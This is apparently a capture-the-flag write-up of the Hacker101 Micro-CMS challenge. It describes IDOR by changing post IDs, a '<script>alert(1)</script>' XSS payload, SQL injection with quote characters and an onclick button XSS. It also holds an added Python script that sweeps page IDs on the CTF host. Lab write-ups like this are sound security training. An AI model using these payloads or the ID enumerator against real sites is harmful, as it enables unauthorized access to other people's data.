Overview
Tested URL: [Micro-CMS](https://7a7f7727a8dbd56088a8f16ee801cbb1.ctf.hacker101.com/)
Application: Micro-CMS
Objective: Find all 4 flags
Unlike the previous challenge, this machine has four flags, making it more engaging.
Steps
1. Starting the Machine:
I started the machine and navigated to the target URL.
2. Exploring URLs:
Following advice from a researcher in a live recon video on YouTube, I opened every URL on the site in a new tab for further testing.
3. Testing URLs:
— Markdown Test:
I noticed a post ID at the end of the URL, suggesting that modifying it might expose other posts. Changing the ID returned a "Forbidden" page, which indicated the parameter was worth probing further.
I experimented with different IDs. ID 6 also returned a "Forbidden" page, but persistence paid off and I found a flag through an Insecure Direct Object Reference (IDOR).
Flag 1 obtained through IDOR.
4. Creating a Test Page:
I created a test post to understand the web application’s behavior. While it didn’t initially reveal anything interesting, it added a post to the homepage, setting the stage for more experiments.
5. XSS Attempt:
I injected a simple XSS payload, `<script>alert(1)</script>`, into the page content. It executed successfully.
6. SQL Injection:
Although I'm a novice at bug hunting, I attempted SQL injection on the edit page by placing `'` or `` ` `` in the parameters. This also worked, revealing another flag.
7. Advanced XSS Testing:
The final flag required a more sophisticated XSS attack. Inspired by hints from various forums, I realized that XSS could be embedded in a button's event handler. I modified the button code in the Markdown Test page to:
```html
<button onclick="alert('flag')">Click me</button>
```
Clicking the button triggered the alert, but it didn't reveal a flag. Inspecting the page source, however, revealed the final flag.
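As an added example for the IDOR step above (this is not code from the original writeup or from Hacker101), here is a small Python enumerator that walks a range of post IDs and classifies each response instead of stopping at the first "Forbidden". The `/page/{id}` path and the `^FLAG^` marker are assumptions; check the real link format on the homepage before pointing it at the target. The constructed `SAMPLE_RESPONSES` table lets it run offline.

```python
import urllib.error
import urllib.request

# Assumed target and URL pattern (an assumption: verify against the homepage links).
BASE = "https://7a7f7727a8dbd56088a8f16ee801cbb1.ctf.hacker101.com"
PAGE_PATH = "/page/{id}"
FLAG_MARKER = "^FLAG^"  # assumed flag prefix; adjust if the target uses another format


def http_fetch(url, timeout=10):
    """GET a URL and return (status, body). 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "idor-enum/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def classify(status):
    """Map an HTTP status to the three outcomes that matter for an IDOR sweep."""
    if status == 200:
        return "readable"
    if status == 403:
        return "forbidden"   # object exists but is access-controlled: keep going
    if status == 404:
        return "missing"     # no such object
    return "other"


def enumerate_pages(ids, fetch=http_fetch, base=BASE, marker=FLAG_MARKER):
    """Probe every ID in `ids`; never abort on 403, since later IDs may be readable."""
    results = {}
    for pid in ids:
        status, body = fetch(base + PAGE_PATH.format(id=pid))
        results[pid] = {
            "status": status,
            "kind": classify(status),
            "has_marker": marker in body,
        }
    return results


def readable_ids(results):
    """IDs the server served with 200, in ascending order."""
    return sorted(pid for pid, r in results.items() if r["kind"] == "readable")


def flagged_ids(results):
    """IDs whose body contained the flag marker."""
    return sorted(pid for pid, r in results.items() if r["has_marker"])


# Constructed sample responses so the sweep can be exercised offline.
SAMPLE_RESPONSES = {
    1: (200, "<h1>Markdown Test</h1>"),
    2: (403, "Forbidden"),
    6: (403, "Forbidden"),
    7: (404, "Not Found"),
    8: (200, "<p>^FLAG^constructed-sample$FLAG$</p>"),
}


def sample_fetch(url):
    """Offline stand-in for http_fetch driven by SAMPLE_RESPONSES."""
    pid = int(url.rsplit("/", 1)[1])
    return SAMPLE_RESPONSES.get(pid, (404, "Not Found"))


if __name__ == "__main__":
    # Swap sample_fetch for http_fetch to sweep the live target.
    res = enumerate_pages(range(1, 10), fetch=sample_fetch)
    for pid, r in res.items():
        print(pid, r["status"], r["kind"], "FLAG" if r["has_marker"] else "")
    print("readable:", readable_ids(res), "flagged:", flagged_ids(res))
```

The point of the sweep is the one the writeup makes: a 403 on one ID says nothing about the neighbours, so the loop records the outcome and moves on rather than treating the first refusal as the end of the road.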
Conclusion
With all four flags captured, this challenge demonstrated the importance of persistent testing and exploring different attack vectors.
Thank you!
My Twitter/X :- https://x.com/0xfxiii